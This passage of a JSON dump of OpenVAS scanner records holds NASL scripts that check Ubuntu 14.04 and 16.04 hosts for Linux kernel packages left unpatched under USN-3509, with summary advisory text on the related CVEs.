A local attacker could\n use this to cause a denial of service (application crashes) or possibly gain\n administrative privileges. (CVE-2017-1000405) Fan Wu, Haoran Qiu, and Shixiong\n Zhao discovered that the associative array implementation in the Linux kernel\n sometimes did not properly handle adding a new entry. A local attacker could use\n this to cause a denial of service (system crash). (CVE-2017-12193) Andrey\n Konovalov discovered an out-of-bounds read in the GTCO digitizer USB driver for\n the Linux kernel. A physically proximate attacker could use this to cause a\n denial of service (system crash) or possibly execute arbitrary code.\n (CVE-2017-16643)\");\n script_tag(name:\"affected\", value:\"linux-aws on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3509-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3509-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1005-aws\", ver:\"4.4.0-1005.5\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-generic\", ver:\"4.4.0-103.126~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-generic-lpae\", ver:\"4.4.0-103.126~14.04.1\", 
rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-lowlatency\", ver:\"4.4.0-103.126~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-powerpc-e500mc\", ver:\"4.4.0-103.126~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-powerpc-smp\", ver:\"4.4.0-103.126~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-powerpc64-emb\", ver:\"4.4.0-103.126~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-powerpc64-smp\", ver:\"4.4.0-103.126~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.4.0.1005.5\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae-lts-xenial\", ver:\"4.4.0.103.86\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lts-xenial\", ver:\"4.4.0.103.86\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency-lts-xenial\", ver:\"4.4.0.103.86\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc-lts-xenial\", ver:\"4.4.0.103.86\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp-lts-xenial\", ver:\"4.4.0.103.86\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n 
{\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb-lts-xenial\", ver:\"4.4.0.103.86\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp-lts-xenial\", ver:\"4.4.0.103.86\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-12193", "CVE-2017-16939", "CVE-2017-16643", "CVE-2017-1000405"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-12-15T00:00:00", "id": "OPENVAS:1361412562310843402", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843402", "type": "openvas", "title": "Ubuntu Update for linux USN-3509-3", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3509_3.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-3509-3\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843402\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-15 12:41:32 +0100 (Fri, 15 Dec 2017)\");\n script_cve_id(\"CVE-2017-16939\", \"CVE-2017-1000405\", \"CVE-2017-12193\", \"CVE-2017-16643\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3509-3\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3509-1 fixed vulnerabilities in the\n Linux kernel for Ubuntu 16.04 LTS. Unfortunately, it also introduced a\n regression that prevented the Ceph network filesystem from being used. This\n update fixes the problem. We apologize for the inconvenience. Original advisory\n details: Mohamed Ghannam discovered that a use-after-free vulnerability existed\n in the Netlink subsystem (XFRM) in the Linux kernel. A local attacker could use\n this to cause a denial of service (system crash) or possibly execute arbitrary\n code. (CVE-2017-16939) It was discovered that the Linux kernel did not properly\n handle copy-on- write of transparent huge pages. 
A local attacker could use this\n to cause a denial of service (application crashes) or possibly gain\n administrative privileges. (CVE-2017-1000405) Fan Wu, Haoran Qiu, and Shixiong\n Zhao discovered that the associative array implementation in the Linux kernel\n sometimes did not properly handle adding a new entry. A local attacker could use\n this to cause a denial of service (system crash). (CVE-2017-12193) Andrey\n Konovalov discovered an out-of-bounds read in the GTCO digitizer USB driver for\n the Linux kernel. A physically proximate attacker could use this to cause a\n denial of service (system crash) or possibly execute arbitrary code.\n (CVE-2017-16643)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3509-3\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3509-3/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1013-kvm\", ver:\"4.4.0-1013.18\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-generic\", ver:\"4.4.0-104.127\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-generic-lpae\", ver:\"4.4.0-104.127\", rls:\"UBUNTU16.04 
LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-lowlatency\", ver:\"4.4.0-104.127\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-powerpc-e500mc\", ver:\"4.4.0-104.127\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-powerpc-smp\", ver:\"4.4.0-104.127\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-powerpc64-emb\", ver:\"4.4.0-104.127\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-powerpc64-smp\", ver:\"4.4.0-104.127\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1044-aws\", ver:\"4.4.0-1044.53\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1080-raspi2\", ver:\"4.4.0-1080.88\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.4.0.1044.46\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.4.0.104.109\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.4.0.104.109\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-kvm\", ver:\"4.4.0.1013.13\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", 
ver:\"4.4.0.104.109\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc\", ver:\"4.4.0.104.109\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"4.4.0.104.109\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb\", ver:\"4.4.0.104.109\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp\", ver:\"4.4.0.104.109\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-raspi2\", ver:\"4.4.0.1080.80\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-12193", "CVE-2017-16939", "CVE-2017-16643", "CVE-2017-1000405"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-12-15T00:00:00", "id": "OPENVAS:1361412562310843403", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843403", "type": "openvas", "title": "Ubuntu Update for linux-lts-xenial USN-3509-4", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3509_4.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-lts-xenial USN-3509-4\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the 
terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843403\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-15 12:41:42 +0100 (Fri, 15 Dec 2017)\");\n script_cve_id(\"CVE-2017-16939\", \"CVE-2017-1000405\", \"CVE-2017-12193\", \"CVE-2017-16643\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-lts-xenial USN-3509-4\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-xenial'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3509-2 fixed vulnerabilities in the\n Linux Hardware Enablement kernel for Ubuntu 14.04 LTS. Unfortunately, it also\n introduced a regression that prevented the Ceph network filesystem from being\n used. This update fixes the problem. 
We apologize for the inconvenience.\n Original advisory details: Mohamed Ghannam discovered that a use-after-free\n vulnerability existed in the Netlink subsystem (XFRM) in the Linux kernel. A\n local attacker could use this to cause a denial of service (system crash) or\n possibly execute arbitrary code. (CVE-2017-16939) It was discovered that the\n Linux kernel did not properly handle copy-on- write of transparent huge pages. A\n local attacker could use this to cause a denial of service (application crashes)\n or possibly gain administrative privileges. (CVE-2017-1000405) Fan Wu, Haoran\n Qiu, and Shixiong Zhao discovered that the associative array implementation in\n the Linux kernel sometimes did not properly handle adding a new entry. A local\n attacker could use this to cause a denial of service (system crash).\n (CVE-2017-12193) Andrey Konovalov discovered an out-of-bounds read in the GTCO\n digitizer USB driver for the Linux kernel. A physically proximate attacker could\n use this to cause a denial of service (system crash) or possibly execute\n arbitrary code. 
(CVE-2017-16643)\");\n script_tag(name:\"affected\", value:\"linux-lts-xenial on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3509-4\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3509-4/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1006-aws\", ver:\"4.4.0-1006.6\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-generic\", ver:\"4.4.0-104.127~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-generic-lpae\", ver:\"4.4.0-104.127~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-lowlatency\", ver:\"4.4.0-104.127~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-powerpc-e500mc\", ver:\"4.4.0-104.127~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-powerpc-smp\", ver:\"4.4.0-104.127~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isdpkgvuln(pkg:\"linux-image-4.4.0-104-powerpc64-emb\", ver:\"4.4.0-104.127~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-104-powerpc64-smp\", ver:\"4.4.0-104.127~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.4.0.1006.6\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae-lts-xenial\", ver:\"4.4.0.104.87\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lts-xenial\", ver:\"4.4.0.104.87\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency-lts-xenial\", ver:\"4.4.0.104.87\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc-lts-xenial\", ver:\"4.4.0.104.87\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp-lts-xenial\", ver:\"4.4.0.104.87\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb-lts-xenial\", ver:\"4.4.0.104.87\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp-lts-xenial\", ver:\"4.4.0.104.87\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-12193", "CVE-2017-16939", "CVE-2017-16643", 
"CVE-2017-1000405"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-12-08T00:00:00", "id": "OPENVAS:1361412562310843398", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843398", "type": "openvas", "title": "Ubuntu Update for linux USN-3509-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3509_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-3509-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843398\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-08 07:04:55 +0100 (Fri, 08 Dec 2017)\");\n script_cve_id(\"CVE-2017-16939\", \"CVE-2017-1000405\", \"CVE-2017-12193\", \"CVE-2017-16643\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3509-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Mohamed Ghannam discovered that a\n use-after-free vulnerability existed in the Netlink subsystem (XFRM) in the\n Linux kernel. A local attacker could use this to cause a denial of service\n (system crash) or possibly execute arbitrary code. (CVE-2017-16939) It was\n discovered that the Linux kernel did not properly handle copy-on- write of\n transparent huge pages. A local attacker could use this to cause a denial of\n service (application crashes) or possibly gain administrative privileges.\n (CVE-2017-1000405) Fan Wu, Haoran Qiu, and Shixiong Zhao discovered that the\n associative array implementation in the Linux kernel sometimes did not properly\n handle adding a new entry. 
A local attacker could use this to cause a denial of\n service (system crash). (CVE-2017-12193) Andrey Konovalov discovered an\n out-of-bounds read in the GTCO digitizer USB driver for the Linux kernel. A\n physically proximate attacker could use this to cause a denial of service\n (system crash) or possibly execute arbitrary code. (CVE-2017-16643)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3509-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3509-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1012-kvm\", ver:\"4.4.0-1012.17\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-generic\", ver:\"4.4.0-103.126\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-generic-lpae\", ver:\"4.4.0-103.126\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-lowlatency\", ver:\"4.4.0-103.126\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-powerpc-e500mc\", 
ver:\"4.4.0-103.126\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-powerpc-smp\", ver:\"4.4.0-103.126\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-powerpc64-emb\", ver:\"4.4.0-103.126\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-powerpc64-smp\", ver:\"4.4.0-103.126\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1043-aws\", ver:\"4.4.0-1043.52\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1079-raspi2\", ver:\"4.4.0-1079.87\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1081-snapdragon\", ver:\"4.4.0-1081.86\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.4.0.1043.45\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.4.0.103.108\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.4.0.103.108\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-kvm\", ver:\"4.4.0.1012.12\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.4.0.103.108\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
